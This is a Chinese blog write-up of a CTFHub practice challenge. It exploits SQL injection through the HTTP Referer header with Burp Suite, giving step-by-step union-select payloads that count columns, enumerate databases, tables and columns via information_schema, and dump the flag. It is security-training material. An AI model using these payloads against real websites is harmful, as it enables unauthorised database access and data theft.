CTFHub | Refer注入

最新推荐文章于 2024-04-09 21:52:17 发布
最新推荐文章于 2024-04-09 21:52:17 发布
阅读量1.6k 收藏 1
点赞数 3
分类专栏: CTF精进之路 文章标签: CTF web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/128035082
版权

 0x00 前言

        CTFHub 专注网络安全、信息安全、白帽子技术的在线学习,实训平台。提供优质的赛事及学习服务,拥有完善的题目环境及配套 writeup ,降低 CTF 学习入门门槛,快速帮助选手成长,跟随主流比赛潮流。

        

        

0x01 题目描述

Refer注入:

        (无)

网页显示内容

        
       

0x02 解题过程

        根据题目显示内容,此题和上一题一致,需要在 Refer 请求头中进行 SQL 注入。那么直接使用 burp suite 抓包工具抓取题目网站的信息,并将抓取到的数据发送给重放器。在 Refer 请求中使用 payload 进行测试,发现此题存在 Refer 注入。那么直接根据注入流程进行注入,最后发现此题 flag 存在于 ncdiyxjtck 数据中。
        

老规矩,直接使用burp suite抓包工具抓取题目网站的信息

        

这次为了方便查看,将抓取到的数据发送给重放器

        

发现抓到的信息中没有Refer请求,那么可以直接写入Refer请求进行测试

Referer: 1 and 1 = 1    #注意Refer请求写入信息名称为Referer

        

继续写入Referer请求中使用进行测试,发现此题存在Refer注入

Referer: 1 and 1 = 2

        

使用order by 判断字段数量,从order by 1开始

Referer: 1 order by 1

判断字段2,使用order by 2

Referer: 1 order by 2

判断字段3,使用order by 3,这里无回显,那么字段数量为2列

Referer: 1 order by 3

知道字段数量为2后,可以查看数据库位置,使用union select 1,2查看未发现数据

Referer: 1 union select 1,2

        

判断数据可能不存在数据库中,将1改为0查看数据,其他符号也可以

Referer: 0 union select 1,2

        

修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22

Referer: 0 union select 1,version()

        

ⅩⅠ修改2为database(),查看数据库名,发现数据库版本为sqli

Referer: 0 union select 1,database()

        

ⅩⅡ查看全部数据库名

Referer: 0 union select 1,group_concat(schema_name)from information_schema.schemata

        

ⅩⅢ在全部数据库名中发现sqli,最后在sqli数据库中发现cirdpxhnev和news两个表名

Referer: 0 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

        

ⅩⅣ先查看cirdpxhnev表中的全部字段名,发现一个数据名为ncdiyxjtck

Referer: 0 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='cirdpxhnev'

        

ⅩⅤ查看数据ncdiyxjtck中的内容,发现此题flag

Referer: 0 union select 1,group_concat(ncdiyxjtck) from sqli.cirdpxhnev

        

        

0x03 Refer 注入常见的问题

1.Refer 和 Referer

        需要注意的是,Refer 只是注入名称,而 Referer header 的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上 Referer ,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。

2.重放 Referer 注入无回显

        有小伙伴私信我,为什么我使用 burp suite 工具进行重放的时候,页面没有正常回显。我第一次使用 burp suite 工具的重放器也犯过此类错误,就是写入一个请求时在其数据的空白行中写入数据。需要注意的是,这个空白行也算抓取到的数据。

例如,重放一个演示请求,数据为 error ,写入位置为抓取到的数据空白行中。重放发现页面没有正常回显。

 

那么在写入的数据后面加入一行空白行,重新执行重放,此时的页面可以正常回显。

         

        

0x04 参考文献

[1].mdn web docs. Referer[EB/OL]. [2022-11-26]. https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Headers/Referer.

[2].百度百科. HTTP_REFERER[EB/OL]. [2022-11-26]. https://baike.baidu.com/item/HTTP_REFERER/5358396.

[3].老司机开代码. Less19 (referer注入)[EB/OL]. [2022-11-26]. https://blog.csdn.net/weixin_43901998/article/details/107021685.

        

        

0x05 总结

文章内容为学习记录的笔记,由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
CTFHub - Refer注入
Have_a_great_day的博客
09-12 595
table_schema=database() :table_schema表示要筛选的表的模式(也就是数据库的名称),而database()是MySQL内置函数,返回当前连接的数据库名称。information_schema:是 information_schema 数据库中的一个表,用于存储关于数据库中所有表的信息,例:表名、所属数据库、表类型、创建时间等。group_concat(列或表达式):函数将指定的列或表达式的值按照默认的逗号分隔符连接起来,并返回一个合并的字符串作为结果。
CTFHUB-Cookie注入
Web学习之路
03-28 202
cookie啊
CTFHUB-技能树-Web题-SQL注入-Mysql结构-Refer注入
最新发布
Static______的博客
04-09 1328
HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。用bp抓到包后,将页面中的数据保存到一个txt文件中,用sqlmap爆破(根据reger注入level需要大于三)也就是说,只有当你向浏览器发送请求时,才会带上referer。得到两个表名,第一张表看名字像是自定义的表,尝试爆破第一张表。-p 指定参数,这里为 -p “id”1,2都显示,有两个回显字段。
【SQL注入13】referer注入基础及实践(基于BurpSuite工具和Sqli-labs-less19靶机平台)
Fighting_hawk的博客
02-21 4610
1. 了解referer的含义与作用; 2. 掌握referer注入的方法。
[CTFhub]CTFhub技能树SQL注入——Refer注入
KKleeeaa的博客
04-05 458
提示:本文章仅限学习参考,切勿用于非法用途。
CTFHUB——Cookie、User-Agent、Referer注入 writeup
wuuconix's blog
08-29 744
背景 我们一般做sql注入的时候,注入点一般都是一个文本框,然后我们可以通过输入某种特殊的语句来获得数据库中的信息,但是有时候这种注入点可不一定给你一个文本框,而可能在请求包中的其他地方。 接下来我分享一下CTFHUB中的三道题,它们的注入点分别是请求包中的Cookie、User-Agent和Referer。它们只是注入点不同,基于的的注入方式都是最基本的union联合注入。所以它们的payload都十分简单和相似。 在这次做题过程中,我还尝试了强大的sqlmap,成功得到了一些结果。 SQL注入——Coo
Fast2Tricks - Daily Update | Refer & Earn-crx插件
03-23
语言:English (United States) Fast2Tricks-印度最佳在线交易和优惠券网站 最好的报价和交易,并形成
SQL注入思路详解
12-14
Refer Host     3.SQL语句测试 由于现在许多web站点都受到WAF防护或者应用开发者自带的代码层Filter,在判断是否存在Sql注入时, 测试payload越简单越好   数字型 数字型 字符型 字符型
noreferrer去除网页跳转refer
12-13
标题“noreferrer去除网页跳转refer”指的正是利用`noreferrer`属性来防止`Referer`头在链接跳转时被发送到目标网站。当一个链接带有`rel="noreferrer"`属性时,浏览器在请求目标页面时将不会包含`Referer`头信息,...
RMA_refer6
07-13
《RMA Refer6:深入理解RMA流程与实践》 在IT行业中,RMA(Return Material Authorization)是一项至关重要的服务流程,它涉及到产品的售后服务、维修和更换。"RMA_refer6"这一主题,结合"RMA refer"的标签,表明...
ctfhub技能树—SQL注入referer注入
Naptmn的博客
02-07 1223
referer是什么? HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 还是bp抓包 但是这次包中没有referer这个部分 所以我们需要添加一下(在headers中选add) 之后就可以在refere开始常规注入了 1、找位点 2、数据库名 3、表名 4、列名 5、查看数据 得到flag ...
24-4 SQL 注入 - http头注入referer注入
weixin_43263566的博客
02-28 350
在代码中,通过检查用户输入的用户名和密码,然后构造SQL语句查询数据库中是否存在匹配的用户记录。如果查询成功,则会将referer和IP地址插入到referers表中,并显示用户的referer信息。如果查询失败,则会显示错误信息,并显示一个图片。这段代码是一个简单的演示网页,主要用于演示头部注入(Header Injection)和基于错误的SQL注入攻击。用户可以在表单中输入用户名和密码,然后提交到服务器端进行处理。
CTFHub | Cookie注入,UA注入Refer注入,过滤空格(利用hackbar插件)
qq_73861475的博客
11-18 956
User-Agent 首部包含了一个特征字符串,用来让网络协议的对端来识别发起请求的用户代理软件的应用类型、操作系统、软件开发商以及版本号。一些网站会把用户的 UA 首部信息写入数据库,用来收集和统计用户信息,如果操作不当就有可能会导致 UA 注入。【超详细版】学习SQL注入看这篇就够了(原理及思路绕过)_sql注入教程_网络安全-李彦暗的博客-CSDN博客1、界面能够回显数据库查询到的数据(必要条件);2、界面回显内容至少能够显示数据库中的某列数据(必要条件);
CTFhub Refer注入
plant1234的博客
06-18 1324
Refer注入: 这道题首先我自己一开始也有点乱,找不到referer在哪里 但根据大佬的博客:https://blog.csdn.net/qq_37450949/article/details/117003065 提示的话知道,referer的一些知识: HTTP_REFERER简介 HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 这句话的意思就是,只有当你向浏
CTFHub技能树web(持续更新)--SQL注入--Refer注入
jiuyongpinyin的博客
09-06 510
Refer注入 首先根据题目提示,实在referer处输入id,那么我们先抓包: 那么我们在发送包的时候携带上这个参数: 这里有回显了,接下来的事情就好办了,先通过order by语句查询几列,发现两列的时候回显正常,接着我们使用联合查询: 这里注入成功了,我们爆破当前数据库: 得到数据库,爆破数据库里面的表名: 得到了奇怪的表名,查看这个表名里面的列: 得到列名,之后爆破里面的字段: 得到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
sql注入系列课程
10-14
本课程是sql注入系列课程,从最基础的sql注入语法讲起,里面包含常见数据库sql注入方法,及各种类型的sql注入,通过sql注入直接获取服务器权限等攻击方法及演示。
攻防_漏洞_referer
redglare的博客
11-24 2039
引用:Referer 是 HTTP 请求header 的一部分,当浏览器(或者模拟浏览器行为)向web 服务器发送请求的时候,头信息里有包含 Referer 。 比如我在www.google.com 里有一个www.baidu.com 链接,那么点击这个www.baidu.com ,它的header 信息里就有: Referer=http://www.google.com 那么可以利用这个来防止盗链了,比如我只允许我自己的网站访问我自己的图片服务器,那我的域名是www.google.com, 那么
ctf之xff_referer伪造
qq_53106085的博客
10-17 3716
xff:xff 是http的拓展头部,作用是使Web服务器获取访问用户的IP真实地址(可伪造)。由于很多用户通过代理服务器进行访问,服务器只能获取代理服务器的IP地址,而xff的作用在于记录用户的真实IP,以及代理服务器的IP。格式为:X-Forwarded-For: 本机IP, 代理1IP, 代理2IP, 代理2IP refererreferer 是http的拓展头部,作用是记录当前请求页面的来源页面的地址。服务器使用referer确认访问来源,如果referer内容不符合要求,服务器可以拦截或者重定
CTFHUB-WEB-SQL注入-Refer注入
weixin_43486981的博客
08-11 984
题目: 靶机环境: 使用burp suite 抓包,发现包信息中并没有refer字段。 根据提示,添加referer字段,进行注入 查看显示位 求数据库名 求表名 求列名 求字段值,得到flag
qnetworkinterfacedoes not refer to a value
06-06
QNetworkInterface是Qt网络模块中的一个类,它提供了一些方法来获取当前主机上的网络接口信息。当报错提示“QNetworkInterface does not refer to a value”时,通常是因为编写的代码使用了未定义或未声明的QNetworkInterface变量或对象,或者QNetworkInterface被误认为是一个变量而不是类。解决这个问题的方法包括: 1. 确保正确引入了Qt网络模块中的QNetworkInterface类; 2. 检查代码中是否存在未定义或未声明的QNetworkInterface变量或对象; 3. 确认QNetworkInterface实例化的方式是否正确; 4. 确定QNetworkInterface被正确定义为一个类,而不是一个变量。 综上,"QNetworkInterface does not refer to a value"的错误通常是由于编写的代码存在语法错误导致的,建议仔细检查代码并根据具体情况进行调整,以确保正确使用QNetworkInterface类。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值